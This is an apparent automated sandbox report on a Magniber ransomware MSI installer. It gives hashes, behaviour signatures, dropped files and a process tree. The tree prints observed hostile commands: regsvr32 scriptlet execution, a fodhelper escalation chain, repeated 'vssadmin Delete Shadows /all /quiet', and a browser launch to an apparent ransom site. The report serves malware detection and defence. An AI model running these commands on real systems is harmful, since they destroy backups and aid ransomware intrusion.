Overview

overview

10

Static

static

1

41ef278a86...3e.msi

windows7-x64

6

41ef278a86...3e.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-08-2024 01:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi

  • Size

    96KB

  • MD5

    42ad49ed99c0d41a820316309bc2c3b3

  • SHA1

    f447a72b3cbea72e1b56fda8f44fd9f304b4474a

  • SHA256

    41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e

  • SHA512

    4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75

  • SSDEEP

    1536:kiqCWq/Gf2CJ7ZrhzZr98n+lW0D80D+7fxun:xqCWqu+q8nLLxun

Score
10/10
magniberdefense_evasiondiscoveryexecutionimpactpersistenceprivilege_escalationransomware

Malware Config

Signatures

  • Detect magniber ransomware 1 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (59) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • System Binary Proxy Execution: Regsvr32 1 TTPs 9 IoCs

    Abuse Regsvr32 to proxy execution of malicious code.

    defense_evasion
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 9 IoCs
  • Loads dropped DLL 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
    persistenceprivilege_escalation
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry class 14 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2580
    • C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
      2⤵
      • System Binary Proxy Execution: Regsvr32
      • Modifies registry class
      PID:1952
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
        PID:2228
        • C:\Windows\system32\fodhelper.exe
          fodhelper.exe
          3⤵
            PID:4796
            • C:\Windows\system32\regsvr32.exe
              "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
              4⤵
              • System Binary Proxy Execution: Regsvr32
              PID:244
              • C:\Windows\System32\vssadmin.exe
                "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                5⤵
                • Interacts with shadow copies
                PID:2684
        • C:\Windows\system32\cmd.exe
          cmd /c "start fodhelper.exe"
          2⤵
            PID:3560
            • C:\Windows\system32\fodhelper.exe
              fodhelper.exe
              3⤵
                PID:4228
                • C:\Windows\system32\regsvr32.exe
                  "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                  4⤵
                  • System Binary Proxy Execution: Regsvr32
                  PID:1972
                  • C:\Windows\System32\vssadmin.exe
                    "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                    5⤵
                    • Interacts with shadow copies
                    PID:824
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\system32\regsvr32.exe
              regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
              2⤵
              • System Binary Proxy Execution: Regsvr32
              • Modifies registry class
              PID:3116
            • C:\Windows\system32\cmd.exe
              cmd /c "start fodhelper.exe"
              2⤵
                PID:4652
                • C:\Windows\system32\fodhelper.exe
                  fodhelper.exe
                  3⤵
                    PID:3600
                    • C:\Windows\system32\regsvr32.exe
                      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                      4⤵
                      • System Binary Proxy Execution: Regsvr32
                      PID:4884
                      • C:\Windows\System32\vssadmin.exe
                        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                        5⤵
                        • Interacts with shadow copies
                        PID:3992
                • C:\Windows\system32\cmd.exe
                  cmd /c "start fodhelper.exe"
                  2⤵
                    PID:4044
                    • C:\Windows\system32\fodhelper.exe
                      fodhelper.exe
                      3⤵
                        PID:1636
                        • C:\Windows\system32\regsvr32.exe
                          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                          4⤵
                          • System Binary Proxy Execution: Regsvr32
                          PID:2664
                          • C:\Windows\System32\vssadmin.exe
                            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                            5⤵
                            • Interacts with shadow copies
                            PID:4344
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2800
                    • C:\Windows\system32\regsvr32.exe
                      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m7
                      2⤵
                      • System Binary Proxy Execution: Regsvr32
                      • Modifies registry class
                      PID:4412
                    • C:\Windows\system32\cmd.exe
                      cmd /c "start fodhelper.exe"
                      2⤵
                        PID:1972
                        • C:\Windows\system32\fodhelper.exe
                          fodhelper.exe
                          3⤵
                            PID:3120
                            • C:\Windows\system32\regsvr32.exe
                              "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                              4⤵
                              • System Binary Proxy Execution: Regsvr32
                              PID:3184
                              • C:\Windows\System32\vssadmin.exe
                                "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                5⤵
                                • Interacts with shadow copies
                                PID:1912
                        • C:\Windows\system32\cmd.exe
                          cmd /c "start fodhelper.exe"
                          2⤵
                            PID:3600
                            • C:\Windows\system32\fodhelper.exe
                              fodhelper.exe
                              3⤵
                                PID:1584
                                • C:\Windows\system32\regsvr32.exe
                                  "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh
                                  4⤵
                                  • System Binary Proxy Execution: Regsvr32
                                  PID:3304
                                  • C:\Windows\System32\vssadmin.exe
                                    "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                    5⤵
                                    • Interacts with shadow copies
                                    PID:996
                          • C:\Windows\system32\msiexec.exe
                            msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
                            1⤵
                            • Enumerates connected drives
                            • Event Triggered Execution: Installer Packages
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:640
                          • C:\Windows\system32\msiexec.exe
                            C:\Windows\system32\msiexec.exe /V
                            1⤵
                            • Enumerates connected drives
                            • Drops file in Windows directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2916
                            • C:\Windows\system32\srtasks.exe
                              C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                              2⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4608
                            • C:\Windows\System32\MsiExec.exe
                              C:\Windows\System32\MsiExec.exe -Embedding 5C2F3D29235E4915D85FD8E182F245CF
                              2⤵
                              • Suspicious use of SetThreadContext
                              • Loads dropped DLL
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of WriteProcessMemory
                              PID:4528
                              • C:\Windows\System32\cmd.exe
                                cmd /c "start microsoft-edge:http://56d8063048503c0068tbodbmuw.ofrisk.info/tbodbmuw^&2^&40162822^&59^&397^&2219041
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3716
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://56d8063048503c0068tbodbmuw.ofrisk.info/tbodbmuw&2&40162822&59&397&2219041
                                  4⤵
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  • Suspicious use of WriteProcessMemory
                                  PID:3336
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff296a46f8,0x7fff296a4708,0x7fff296a4718
                                    5⤵
                                      PID:3432
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
                                      5⤵
                                        PID:5028
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
                                        5⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3756
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
                                        5⤵
                                          PID:1284
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
                                          5⤵
                                            PID:3308
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
                                            5⤵
                                              PID:5000
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
                                              5⤵
                                                PID:2528
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
                                                5⤵
                                                  PID:4840
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:8
                                                  5⤵
                                                    PID:2684
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:8
                                                    5⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3944
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4332 /prefetch:1
                                                    5⤵
                                                      PID:4340
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4216 /prefetch:1
                                                      5⤵
                                                        PID:4680
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                                                        5⤵
                                                          PID:5096
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
                                                          5⤵
                                                            PID:1448
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1
                                                            5⤵
                                                              PID:4272
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
                                                              5⤵
                                                                PID:1932
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 /prefetch:2
                                                                5⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:208
                                                      • C:\Windows\system32\vssvc.exe
                                                        C:\Windows\system32\vssvc.exe
                                                        1⤵
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4492
                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                        1⤵
                                                          PID:3356
                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                          1⤵
                                                            PID:2692

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Config.Msi\e57a326.rbs
                                                            Filesize

                                                            7KB

                                                            MD5

                                                            9ed1e3770f38355cfb627ad9922e089a

                                                            SHA1

                                                            801df41a3bd5fad617bdb6a044a17610dfefa9c0

                                                            SHA256

                                                            e1af9770b4cbab3373b526fa1942468c96b7d5c2dc940fd88e28ceb0251c2a60

                                                            SHA512

                                                            293aa30b13b1f699ae348f84593da79b19c0711b7e83bb1b5d0b02243479ddaa9f17042a17aa9e135ac21bc089e301d128466d83cf2dd0ba4a72aa97404dd1b8

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                            Filesize

                                                            152B

                                                            MD5

                                                            b9569e123772ae290f9bac07e0d31748

                                                            SHA1

                                                            5806ed9b301d4178a959b26d7b7ccf2c0abc6741

                                                            SHA256

                                                            20ab88e23fb88186b82047cd0d6dc3cfa23422e4fd2b8f3c8437546a2a842c2b

                                                            SHA512

                                                            cfad8ce716ac815b37e8cc0e30141bfb3ca7f0d4ef101289bddcf6ed3c579bc34d369f2ec2f2dab98707843015633988eb97f1e911728031dd897750b8587795

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                            Filesize

                                                            6KB

                                                            MD5

                                                            05dd0a4757c17993b6a3d4be3e7f7a9c

                                                            SHA1

                                                            1b21c30a601402e2198539d70ca1320b98970792

                                                            SHA256

                                                            915742e221dc451128f7a2be82c9203cdd8bced90a35e8a11709ad5bbf62eda1

                                                            SHA512

                                                            897854e5f77b6d1d218bd412543c4824d04f8d771821e7f3e60d4de3a9e24199b421470e99d033593ddc3608acc6980c59e2f6f6aea7cf56f3dd639048adb1b6

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                            Filesize

                                                            6KB

                                                            MD5

                                                            8b7260bddfeebaa67e5d43b500ffb653

                                                            SHA1

                                                            c92cc81d57e05d645b3f8f95b880a8e524a9ea74

                                                            SHA256

                                                            29d728ce685826916a9fdc6ac526015f60432295962b0f3e04f671761ae421d6

                                                            SHA512

                                                            f3dfe431419b193da1b5d7f3ad02760511836a87ca74df1391ba03e6a99807361e42521b6e15dd339b33a8c082820ed20afa6e2b48227bed39ec0b00b1eb4be7

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                            Filesize

                                                            16B

                                                            MD5

                                                            6752a1d65b201c13b62ea44016eb221f

                                                            SHA1

                                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                            SHA256

                                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                            SHA512

                                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                            Download Submit

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                            Filesize

                                                            11KB

                                                            MD5

                                                            beb8bb20ca878b90dd071ac7ce907816

                                                            SHA1

                                                            3eed4d5d2983479dca682589a1bf31bca4e56a4f

                                                            SHA256

                                                            e96041830bee77878ee14bc62e5f72340a807d914a53037aea6bf762a166ef30

                                                            SHA512

                                                            fcedb7ef5256f25b64243d820f0529d7569a6df60b41b87392a0d26fced6c2659cde377558ab4b0ef008541328565ef9c6dfdb8be7af698dde86f1493dba73f7

                                                            Download Submit

                                                          • C:\Users\Admin\Pictures\README.html
                                                            Filesize

                                                            17KB

                                                            MD5

                                                            d518e293233da5c89ef0bfdd8a3425f4

                                                            SHA1

                                                            a0e5d0606ca4623fc0beeb7efe1dd6c28790cbdf

                                                            SHA256

                                                            e7ae65c9c9688fe3140e042dd25dfe0d9c36f9afd8c84ba8aaeb4ac864ae397c

                                                            SHA512

                                                            8473f11789963895615629dcd715067de559169e194df15501faedb47935a6f40d66e0b255aabfc41ab26545e70bc2341acd97cf48c0a57653823decf63023c1

                                                            Download Submit

                                                          • C:\Users\Public\dsv3cwbg27yh
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            947919690674ae37064deafb3fa326db

                                                            SHA1

                                                            b79f7f3ad22c9e84546750502f517d16a7618366

                                                            SHA256

                                                            fa4d045e690fbaa4f22fc3827f168e59791e1677ee6c5888a37aa8caf964d801

                                                            SHA512

                                                            c7fcc911acc3084985f07add40a0a41d6628ca567016551196744444e39a562444385647ea5741357bf8bc49695e9cd83cb9d6c45be6f71ef31263b52ba0e32b

                                                            Download Submit

                                                          • C:\Users\Public\x5m0mhr74m7
                                                            Filesize

                                                            4KB

                                                            MD5

                                                            a756835ce38c068139d8fad26cb47fed

                                                            SHA1

                                                            c1bb3d145188606d07e7b29d86ea6a08586e268d

                                                            SHA256

                                                            d5cfccfe2e3f5ecb566543c74f2972176f61a857234fd33a48325e9459742a78

                                                            SHA512

                                                            d18aa222daf8c3e51e5bf58d2c6ff531b0db92a03f8546efa8add0ac77de4649b1cc73811ad991cc75eb2a9eb22b07ca5d0924569440aba99ce0416527547fac

                                                            Download Submit

                                                          • C:\Windows\Installer\MSIA3D1.tmp
                                                            Filesize

                                                            56KB

                                                            MD5

                                                            91de8a79098ac3d20726e1acb50cd05d

                                                            SHA1

                                                            9cb04003c75f0cb63fe0c6dcd22a0c64d63154be

                                                            SHA256

                                                            54f8d71fb3117854743d594aa28427b943e5b2fb46f6003dbf4a9b562ebbfcea

                                                            SHA512

                                                            70cf1fe2c4d9b68c12b30df9013c4a1fd5b5a9fef1de704a42535259d1196b35eca6191270b19dedc4d3699b8211868b6b31a5ae3cccdc24711fb335fc32edc3

                                                            Download Submit

                                                          • C:\Windows\Installer\e57a325.msi
                                                            Filesize

                                                            96KB

                                                            MD5

                                                            42ad49ed99c0d41a820316309bc2c3b3

                                                            SHA1

                                                            f447a72b3cbea72e1b56fda8f44fd9f304b4474a

                                                            SHA256

                                                            41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e

                                                            SHA512

                                                            4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75

                                                            Download Submit

                                                          • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                            Filesize

                                                            23.7MB

                                                            MD5

                                                            748f21b17f5c97fbf12db662baf97522

                                                            SHA1

                                                            0acab6eca1c28ce70c6b9efb936d204319516e40

                                                            SHA256

                                                            412b5f59c0890c63f0580c0def1c077a8584162c61088847f384b48a6f15e9a2

                                                            SHA512

                                                            8265f7e2cbb5ed8b6cbbcb6d25cd22e7e576ac1be67ea35c9a830c58b3be25d7931d4ba4d4c1fe0daad5c74dc4436fb6b6902c1f19d7052ea168ed801bacb055

                                                            Download Submit

                                                          • \??\Volume{fa3589b5-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{dfdc9f50-630a-437e-a83c-03c5e8a6c3f1}_OnDiskSnapshotProp
                                                            Filesize

                                                            6KB

                                                            MD5

                                                            85b33f3d2db16c53139657fd9f4ed2d2

                                                            SHA1

                                                            f4036b2eeddbb298708489956ebe1f6782b095b5

                                                            SHA256

                                                            194b6846dd408d46df7ac68cb91bd5ed27a12375a16dbad09eddf18b0ab6d9e0

                                                            SHA512

                                                            ba210334ed444df2b6d12220bdbc451f60f57cfd908c87136cd836c50aeda7e78914f78d67424d491a1a7bfaad391cd4eb3bca8a2d33619898a11df7f27bfcee

                                                            Download Submit

                                                          • memory/2580-11-0x000001DC6AC30000-0x000001DC6AC33000-memory.dmp

                                                            Filesize

                                                            12KB

                                                            Download